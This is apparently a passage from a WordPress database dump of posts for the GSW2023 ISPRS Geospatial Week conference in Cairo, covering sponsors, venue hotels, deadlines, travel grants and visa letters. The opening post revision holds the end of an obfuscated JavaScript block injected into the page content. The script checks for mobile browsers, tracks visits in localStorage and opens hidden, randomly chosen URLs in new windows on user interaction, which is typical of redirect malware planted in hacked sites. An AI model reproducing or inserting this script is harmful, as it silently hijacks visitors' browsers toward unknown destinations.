)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 14:26:21','2023-06-09 14:26:21','',3066,'https://gsw2023.com/?p=4651',0,'revision','',0),
(4652,1,'2023-06-09 14:27:08','2023-06-09 14:27:08','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation 